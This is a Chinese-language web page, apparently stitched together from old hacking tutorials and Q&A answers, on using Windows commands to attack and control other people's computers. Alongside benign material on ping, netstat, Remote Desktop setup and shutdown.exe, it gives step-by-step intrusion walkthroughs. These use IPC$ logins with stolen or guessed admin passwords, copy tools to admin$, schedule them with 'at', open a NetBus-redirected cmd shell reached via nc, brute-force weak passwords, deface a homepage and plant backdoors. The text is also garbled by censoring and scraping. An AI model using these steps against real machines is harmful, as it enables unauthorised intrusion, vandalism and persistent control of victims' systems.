cmd攻击别人电脑命令，

工欲善其事，必先利其器”——当然不是让你再满世界去找新的黑客软件啦(其实我不反对使用这些软件，相反我很喜欢用它们，但是必须是在知其所以然的情况下使用，才有可能对自身的电脑水平有所帮助)，要进行入侵工作的话，至少(我认为)得装上NT操作系统，以它作为入侵平台，因为NT本身对 *** 的支持可以说比WIN9X来得更强大得多……当然，如果想对UNIX系统动点小手术( *** 中的UNIX可始终还是主流呀)而又没钱装UNIX的话，LINUX也极佳的选择(特别是现在国内至少有七八种中文LINUX版本——想当年要给REDHAT配上中文支持是何等麻烦……)，至少你可以借此了解UNIX系统的基本操作以及文件存放位置、系统配置、编译器、各种动作之后的记录等等……

然后还得再学点编程语言，至少C与UNIX下的SHELL编程得会一点，能看懂人家写的利用各种漏洞的程序，能对它进行修改，偶尔还能写几个小程序放到网上让大伙儿乐乐，这样玩起来才可能有成就感(其实我自己还不太行，但这多少是个目标)

好了，废话少说，先讲讲一些MS系统里自带的相关 *** 程序的使用吧。

在MS的操作系统中，与 *** 安全较有关系的几个命令/程序是:ping\winipcfg\tracert\net\at\netstat,且待我慢慢道来:

1. ping:这是TCP/IP协议中最有用的命令之一

它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远程主机很有用，它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时间。

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]

[-r count] [-s count] [[-j host-list] | [-k host-list]]

[-w timeout] destination-list

Options:

-t Ping the specifed host until interrupted.(除非人为中止，否则一直ping下去)

-a Resolve addresses to hostnames.(把IP转为主机名)

-n count Number of echo requests to send.(响应请求的数量)

-l size Send buffer size.(封包的大小)

-f Set Don't Fragment flag in packet.(信息包中无碎片)

-i TTL Time To Live.(时间)

-v TOS Type Of Service.(服务类型)

-r count Record route for count hops.

-s count Timestamp for count hops.

-j host-list Loose source route along host-list.

-k host-list Strict source route along host-list.(较严格的……唉，怎么译好……算了，放着吧)

-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)

比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的 *** 阻塞)。

其实这个命令主要是用来看对方应答的速度，如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了，它不在你的射程之内。

2. winipcfg:

这是用来看自己IP位址的小工具，win98自带，NT里则 *** 监视器里就能看到IP了，还有个小实用程序叫……好象是叫IPCONFIG吧，没怎么用，都快忘了……这种东东网上其实相当之多，但既然“自带”，又何须外求，何况网上下载的黑客的东东里有没有特洛伊犹未可知，再说了，如果你不是在自己的“爱姬”上运行，岂不是就没法干活?——哈，不好意思，跑题了，但——接着跑两句:可以把一些常用的、经典的工具上传到网上，当作一个备份，什么时候在网吧、某家公司要干活的话，直接下载就是一个完整无缺的工具包了。

这个东东相当简单，直接在DOS下键入命令就是了，没有什么参数。

3. tracert:是验证通往远程主机路径的实用程序

用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

参数:

-d Do not resolve addresses to hostnames.(不将IP转为主机名)

-h maximum_hops Maximum number of hops to search for target.(更大跟踪数量)

-j host-list Loose source route along host-list.

-w timeout Wait timeout milliseconds for each reply.(time out 的时间)

最简单的用法就是 tracert hostname 其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。TRACERT将返回数据包借以到达最终目的地的各种IP地址，你知道该怎么利用它吗?

我略为解释一下吧:跟踪通往210.142.192.130的路由，更大30:

之一行:*^%* 我就是从这里出去的(呵，真不想说^^)

第四行:是不是快要出国了呢?

第九行:呀!这是日本鬼子的地盘……

4. net:这可是个非常棒的东西，如果不会用的话，赶紧睁大眼睛噢

这个命令的语法是: 可用的命令包括:

NET ACCOUNTS NET HELP NET SHARE

NET COMPUTER NET HELPMSG NET START

NET CONFIG NET LOCALGROUP NET STATISTICS

NET CONFIG SERVER NET NAME NET STOP

NET CONFIG WORKSTATION NET PAUSE NET TIME

NET CONTINUE NET PRINT NET USE

NET FILE NET SEND NET USER

NET GROUP NET SESSION NET VIEW

NET HELP SERVICES 列出用户可以启动的 *** 服务。

NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。

NET HELP command | MORE 用于逐屏显示帮助。

我可就不逐样解释了——这样会把我的手指累坏，就说说常用的两个命令吧

a.net view

这个命令的语法是:

NET VIEW [\\computername | /DOMAIN[:domainname]]

NET VIEW /NETWORK:NW [\\computername]

NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时，它就会显示当前域或 *** 上的计算机上的列表。

\\computername 指用户希望浏览其共享资源的计算机。

/DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名，就会显示局域 *** 上的所有域。

/NETWORK:NW 显示 NetWare *** 上所有可用的服务器。如果指定了一个计算机名，就会显示NetWare *** 中那个计算机上的可用资源。

至于举例嘛，比如你知道一个远程计算机***.***.**.***上有开资源共享，那么运行net view \\***.***.**.*** 就可以了

b.net use

这个命令的语法是:NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]

[/USER:[domainname\]username]

[[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE [devicename | *] [password | *]] [/HOME]

NET USE [/PERSISTENT:{YES | NO}]

NET USE 用于将计算机与共享的资源相连接，或者切断计算机与共享资源的连接。当不带选项使用本命令时，它会列出计算机的连接。

devicename 指定一个名字以便与资源相连接，或者指定要切断的设备。有两种类型的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入一个星号来代替一个指定的设备名可以分配下一个可用设备名。

\\computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符，就要将双反斜线 (\\) 和计算机名一起用引号 (" ")括起来。计算机名可以有1 到15 个字符。

\sharename 指共享资源的 *** 名字。

\volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务(Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务器) 并使之与NetWare 服务器相连。

password 指访问共享资源所需要的密码。

* 进行密码提示。当在密码提示符下输入密码时，密码是不会显示的。

/USER 指定连接时的一个不同的用户名。

domainname 指定另外一个域。如果缺省域，就会使用当前登录的域。

username 指定登录的用户名。

/HOME 将用户与他们的宿主目录相连。

/DELETE 取消一个 *** 连接，并且从永久连接列表中删除该连接。

/PERSISTENT 控制对永久 *** 连接的使用。其缺省值是最近使用的设置。

YES 在连接产生时保存它们，并在下次登录时恢复它们。

NO 不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被恢复。可以使用 /DELETE 选项开关来删除永久连接。

PS:前两天在绿色兵团的贴子里见到一位仁兄的话，与这个命令有异曲共工之妙，也说明一个大概:

在浏览器中输入 file:///\\***.***.**.***\c

则网上共享的C盘内容就会显示出来了，就仿佛用浏览器上FTP站点看到的一样。各位不妨试试，还可试试举一反三……

5.at: 排定在特定的日期和时间运行某些命令和程序。

运行 AT 命令之前必须先启动 Schedule 服务。瞧，现炒就得现卖，刚学了net命令，但这个start命令我可没详述，自已看看帮助文件，摸索一下各种命令的用法吧。

C:\net start schedule

Schedule 正在启动服务.....

Schedulw 服务启动成功。

AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]

AT [\\computername] time [/INTERACTIVE]

[ /EVERY:date[,...] | /NEXT:date[,...]] "command"

\\computername 指定远程计算机。如果省略这个参数命令会被排定在本机上运行。

id 指定给排定进度命令的识别号。

/delete 删除某个已排定进度的命令。如果省略标识，计算机上所有已排定进度的命令都会被删除。

/yes 用于删除所有作业，且不想在运行删除时显示确认信息 。

time 指定命令运行的时间。

interactive 允许作业在运行时，与用户通过桌面交互。

/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。

如果省略日期，则默认为在每月的本日运行。

/next:date[,...] 指定在下一个指定日期 (如，下周三)，运行命令。

如果省略日期，则默认为在每月的本日运行。

"command" 准备运行的 Windows NT 命令或批处理文件。

知道了如何使用AT，再来看看如何在远程NT上运行ntsrv.exe:

1 利用管理员登陆到目的服务器， *** 为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"

2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start

3 利用AT.EXE在远程服务器设置程序定时运行，当然最快运行最理想，所以，你可以用letmein.exe得到服务器的时间，然后:

at \\x.x.x.x 00:00 ntsrv.exe /port:64321

其中00:00要改为用letmein.exe得回来的具体时间+一点容量，等一会后，再在本地启动netbus.exe，键入目的服务器得ip地址或hostname，连接!比如之一种 *** ，你想要在目的服务器运行诸如病毒之类的东东，可以利用netbus得上传功能，将各种“大补丸”上传至目的服务器，再用netbus的"Start program"，键入完整路径，就ok了!第二种 *** 是利用netbus的“App redirect”功能，启动远程telnet服务，如下:在netbus中击“App redirect”，键入"C:\winnt\system32\cmd.exe"，Port为:4321，服务就启动了，然后在本地运行:nc x.x.x.x 4321，出现dos启动的画面就表示连接成功:

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1996 Microsoft Corp.

C:\

注:这里有一小段是抄KILLUSA的文章——别找我要稿费啊^^

4.netstat 这是一个观察 *** 连接状态的实用工具。

它能检验IP的当前连接状态，在断定你的基本级通信正在进行后，就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话，它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具，是WIN界面的，更加直观而已，并没有多什么功能，这个命令的具体用法如下:

Displays protocol statistics and current TCP/IP network connections.(显示协议与当前 *** 连接)

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.(显示所有连接和监听端口)

-e Displays Ethernet statistics. This may be combined with the -s

option.(显示以太连接，可以与-s连用)

-n Displays addresses and port numbers in numerical form.(显示地址和端口)

-p proto Shows connections for the protocol specified by proto; proto

may be TCP or UDP. If used with the -s option to display

per-protocol statistics, proto may be TCP, UDP, or IP.

-r Displays the routing table.

-s Displays per-protocol statistics. By default, statistics are

shown for TCP, UDP and IP; the -p option may be used to specify

a subset of the default.

interval Redisplays selected statistics, pausing interval seconds

between each display. Press CTRL+C to stop redisplaying

statistics. If omitted, netstat will print the current

configuration information once.(interval是设定一个刷新时间，在间隔时间内暂停，按CTRL+C停止……)

这是我在本机未连接 *** 时运行的，之一列为协议，第二列为本地地址，第三列是与你进行连接的主机或用户的IP位址(IP后冒号之后的数字是端口号)，最后一列是状态。这个命令以-n和-a的参数我较常使用，读者可以参考使用。

怎样远程控制别人电脑!通过编程！或是代码什么的？

灰鸽子尽量不用，那个已被杀毒软件100%认为是木马，即使你无恶意地控制也会被杀毒软件干掉。用xp远程控制就简单，不过当你控制别人时人家的电脑屏幕看不见你在干什么，显示为登录前的画面。

“我的电脑”“属性”“远程”，两个都打钩，两台电脑都要做。再对两台电脑防火墙设置别挡住了。

到你要控制那台电脑前，“控制面板”“ *** 连接”“本地连接”“支持”可以看到一个IP地址。还要记下那台机的用户名，如果有密码也要记。

回到你的电脑，启动xp远程控制，输入那个IP和用户名和密码就能够控制到了。 我的qq 1 57 57 36 30

如何控制远程别人的电脑

你好，这个可以通过电脑 *** 的远程控制来进行请求控制他人的电脑，或者使用Windows官方的远程控制，输入ip，用户名和密码也能够进行远程，再或者是用向日葵之类的远程控制软件来进行操控。

怎样用CMD命令控制对方电脑!

你知道IPC$漏洞吗??

什么是IPC：

IPC是指"InterProcess Communications",准确的说是ipc$，是默认的在系统启动时的admin共享。

IPC$是Windows NT/2K中特有的远程 *** 登陆功能，它的特点是在同一时间内，两个IP之间只允许建立一个连接。

注意，你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。

可不可以通过IPC$暴力破解密码？当然可以 ！ 不过，是不是太笨了点 …

2、首次启动流光，会看到注册的画面，具体操作请参考本人之一篇教程。我们在主页面上可以有几种 *** 来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板，那么就可以用命中率高的办法来探测了（测试一堆IP来得到弱口令）。

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。

图1-2

3、出先了上面的小窗口，输入我们要破解的IP段，我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，这样可以加快扫描的速度 ：）填入IP，选择扫描NT/98主机

4、探测中…… （图3-4）

（注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现"IP保留"的字样）

有远程主机的管理密码了，我们剩下的就是想办法控制它了，有什么好办么？ ：）有的是 ！自己看看工具－菜单下的IIS远程命令:)是不是很简单呢，我以后在说，今天还是先练习net 命令吧。

黑了他 ！

开个dos prompt 执行如下命令，本次用的例子如下图。

1、 net use \对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接

2、 copy icmd.exe \对方ip\admin$ || admin$是对方的winnt目录 ：） 这里文件多。

3、 net time \对方IP || 看看对方的本地时间

4、at \对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序，在这里我们用soon这个程序来做也可以，它可以取代 3/4两步。

5、 telnet 对方ip 端口 ||

6、输入pass （如果不是用icmd.exe，或者没有设置口令就不用了） ||

7、在开个窗口，继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

如果我们真的想黑了他，只需要把我们的首页文件覆盖目标的首页就ok了，我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止，一般是在X:\interpub\wwwroot\ .

假如首页文件是default.htm并且在c:\interpub\wwwroot，这样:copy default.htm \ip\c$\interpub\wwwroot

下面的图有演示

8、其实黑人家是很低级并且没意思的：（，我们更好是物有所有，作成跳板吧，今后干活方便点：

执行我们copy 过去的ntlm.exe ，取消验正。在给自己留个后门，比如提升guest的权限，或者其它的后门工具，这类东西多了自己选吧，看看杀手copy的那堆东西 ：）

如何远程控制另一台电脑 win10

前提条件是对方必须得要开启电脑的远程控制，否则计算机就连接不上

远程用户的两台电脑都得在局域网或广域网之中。

win10远程控制开启 *** 如下：

1、首先右击桌面的此电脑，单击属性，选择左边的“远程设置”

向左转|向右转

2、然后在远程的选项卡中单击选择“允许远程协助连接这台计算机”，然后再单击选择“允许远程连接到此计算机“

向左转|向右转

3、之后选择添加需要远程的用户，单击”选择用户“进入远程桌面用户页面之后，单击添加按钮添加远程控制的计算机用户名，点击确定，再点应用，再点确定即可

向左转|向右转

4、单击左下角的开始按钮，点所有应用，将滚动条向下拉点击Windows附件再向下拉就可以看到远程桌面连接的应用软件了，点击进入。

远程控制电脑代码

远程控制代码大致有这几个步骤：

(1)文件传送

(2)文件接收

(3)文件显示

(4)文件控制等。

文件传送

文件传送大致有获取数据，设置缓冲区，定义数据结构，封包，发送的几个过程，这几个步骤大部分都是在编写程序，就是在设计控制代码。控制代码的编写一定要符合运算过程，这是保证是否正常运算的原因，过程也不能少，所以编写代码是所有任务中最艰巨的，也是最关键的。

文件接收

文件接收大致有接收包，按包号计算偏移，接收完毕，写入，还原等这几个步骤。接之一步过程，所以先接收到文件包，计算是否有偏移，然后一步一步接收完毕，写入后开始还原，还原到与发送机器完全相同，这样在后期控制时才能达到一致。

文件显示

文件显示是指在第二步接收到文件在接受机器上显示与发送机器相同，达到控制一致，所以后期的控制才能有效。

文件控制

文件控制就是所有的代码都要得到证明，证明所有过程都是满足原理的。控制要靠操作才能完成，可能后期的操作都经过了完善，直接看标注都知道进行了哪种操作，但 *** 的代码操作就显得有些困难了。

让别人电脑关机的代码

这个代码好写，但是如果要远程控制，必须保证对方计算机在同一局域网里。

代码：shutdown.exe -s -t 0 -m (计算机名)

-s意思是关机 -t 0是0秒后 -m用来指明你要操作的计算机名称

如何远程控制别人电脑

我们有必要先了解一下WINDOWS XP的关机。Windows XP系统通过一个名为Shutdown.exe的程序来完成关机操作(位置在Windows\System下)，一般情况下XP的关机是由关机程序shutdown.exe来实现的，关机的时候调用shutdown.exe。由此可知要阻止强行关机就是要取消对shutdown.exe的调用。而笔者发现冲击波和震荡波的关机重启都要调用这个程序，于是答案由此而生： 在弹出强行关机的对话框时，快速打开[运行]窗口(按下CTRL+R)，输入“shutdown.exe -a”(注意有一个空格)，回车，这时你可以看到强行关机的对话框消失了。然后就可以轻松地干掉冲击波和震荡波。 当然这种 *** 不仅可用于此，其它一些原因引起的关机也如法炮制。 既然谈到shutdown.exe,有必要将其它重要参数介绍一下： shutdown.exe -a 取消关机 shutdown.exe -f 强行关闭应用程序。 shutdown.exe -m \计算机名 控制远程计算机。 shutdown.exe -i 显示图形用户界面，但必须是Shutdown的之一个参数。 shutdown.exe -l 注销当前用户。 shutdown.exe -r 关机并重启。 shutdown.exe -t时间 设置关机倒计时。 shutdown.exe -c"消息内容" 输入关机对话框中的消息内容(不能超127个字符)。 比如你的电脑要在23:00关机，可以选择“开始→运行”，输入“at 23:00 Shutdown -s”，这样，到了23点，电脑就会出现“系统关机”对话框，默认有30秒钟的倒计时并提示你保存工作。如果你想以倒计时的方式关机，可以输入“Shutdown.exe -s -t 3600”，这里表示60分钟后自动关机，“3600”代表60分钟。 如果想取消的话，可以在运行中输入“shutdown -a”。另外输入“shutdown -i”，则可以打开设置自动关机对话框，对自动关机进行设置。 虽然shutdown.exe是Windows XP下的程序，在Windows2000中是调用Windows下System中的Shell32.dll文件来实现关机的，例如“indir\RunDLL32.exe indir\System\Shell32.dll，SHExitWindowsEx 8”，但在Win2000也可利用它， *** 如下： 在WinXP安装目录下的System32文件夹中找到Shutdown.exe，将它复制到Win2000安装目录下的System32文件夹中，在“运行”中输入“Shutdown.exe”，即可像在Windows XP中一样使用该程序了。 当然，shutdown.exe还有一些强大的功能，读者可以进一步实践探讨，充分利用 shutdown.exe 的强大功能。 == 关机文件SHUTDOWN常用参数 在Windows XP中，新增了一条命令行工具“shutdown”，其作用是“关闭或重新启动本地或远程计算机”。利用它，我们不但可以注销用户，关闭或重新启动计算机，还可以实现定时关机、远程关机。 该命令的语法格式如下： shutdown [-i |-l|-s |-r |-a] [-f] [-m [\\ComputerName]] [-t xx] [-c "message"] [-d[u][p]:xx:yy] 其中，各参数的含义为： -i 显示图形界面的对话框。 -l 注销当前用户，这是默认设置。-m ComputerName 优先。 -s 关闭计算机。 -r 关闭之后重新启动。 -a 中止关闭。除了 -l 和 ComputerName 外，系统将忽略其它参数。在超时期间，您只可以使用 -a。 -f 强制运行要关闭的应用程序。 -m [\\ComputerName] 指定要关闭的计算机。 -t xx 将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。 -c "message" 指定将在“系统关闭”窗口中的“消息”区域显示的消息。最多可以使用 127 个字符。引号中必须包含消息。 -d [u][p]:xx:yy 列出系统关闭的原因代码。 首先，我们来看一下该命令的一些基本用法： 1、注销当前用户 shutdown - l 该命令只能注销本机用户，对远程计算机不适用。 2、关闭本地计算机 shutdown - s 3、重启本地计算机 shutdown - r 4、定时关机 shutdown - s -t 30 指定在30秒之后自动关闭计算机。 5、中止计算机的关闭 有时我们设定了计算机定时关机后，如果出于某种原因又想取消这次关机操作，就可以用 shutdown - a 来中止。如： shutdown -s – t 300 设定计算机在5分钟后关闭。 Shutdown – a 取消上述关机操作。 以上是shutdown命令在本机中的一些基本应用。前面我们已经介绍过，该命令除了关闭、重启本地计算机外，更重要的是它还能对远程计算机进行操作，但是如何才能实现呢？ 在该命令的格式中，有一个参数[-m [\\ComputerName]，用它可以指定将要关闭或重启的计算机名称，省略的话则默认为对本机操作。于是，我用以下命令试了一下： shutdown –s –m \\netproxy -t 30 (在30秒内关闭计算机名为netproxy的机器；注：netproxy为局域网内一台同样装有Windows XP的电脑) 但该命令执行后，计算机netproxy一点反应都没有，我的屏幕上却返回这样一句话：Access is denied （拒绝访问）。 为什么会出现这种情况呢？我想了半天，四处查找有关的资料，终于发现，在Windows XP默认的安全策略中，只有管理员组的用户才有权从远端关闭计算机，而一般情况下我们从局域网内的其他电脑来访问该计算机时，则只有guest用户权限，所以当我们执行上述命令时，便会出现“拒绝访问”的情况。 找到问题的根源之后，解决的办法也很简单，只要在客户计算机（能够被远程关闭的计算机，如上述的netproxy）中赋予guest用户远程关机的权限即可。这可利用Windows XP的“组策略”或“管理工具”中的“本地安全策略”来实现。下面以“组策略”为例进行介绍： 1、单击“开始”按钮，选择“运行”，在对话框中输入“gpedit.msc”，然后单击“确定”，打开“组策略编辑器”。 2、在“组策略”窗口的左窗格中打开“计算机配置”—“Windows 设置”—“安全设置”—“本地策略”—“用户权利指派”。 3、在“组策略”窗口的右窗格中选择“Force shutdown from a remote system （从远端系统强制关机）”，双击。 4、在弹出的对话框中显示目前只有“Administrators”组的成员才有权从远程关机；单击对话框下方的“添加用户或组”按钮，然后在新弹出的对话框中输入“guest”，再单击“确定”。 5、这时在“从远端系统强制关机”的属性中便添加了一个“guest”用户，单击“确定”即可。 6、关闭“组策略”窗中。 通过上述操作后，我们便给计算机netproxy的guest用户授予了远程关机的权限。以后，我们要远程关闭计算机netproxy，只要在 *** 中其他装有Windows XP 的电脑中输入以下命令即可： shutdown -s –m \\netproxy -t 30 （其他参数用法同上） 这时，在netproxy计算机的屏幕上将显示一个“系统关机”的对话框，提示“系统即将关机。请保存所有正在运行的工作，然后注销。未保存的改动将会丢失。关机是由netproxy\guest初始的。”在对话框下方还有一个计时器，显示离关机还有多少时间。在等待关机的时间里，用户还可以执行其他的任务，如关闭程序、打开文件等，但无法关闭该对话框，除非你用shutdown –a命令来中止关机任务。 最后，有一点要说明的是，shutdown命令不但可以远程关闭装有Windows XP系统的计算机，它还可以远程关闭装有Windows 2000系统的计算机（对于Win9X嘛，好像不适用）。有关Windows 2000客户计算机上的一些设置，操作 *** 同上，这里就不再多说了。 另外shutdown作为一个外部命令（其对应文件为\Windows\system32文件夹下的shutdown.exe），我们还可将它复制到Windows 2000的机器上，这样，在装有Windows 2000系统的机器之间便也能相互实现远程关机。 参考资料： http://zhidao.baidu.com/question/3592520.html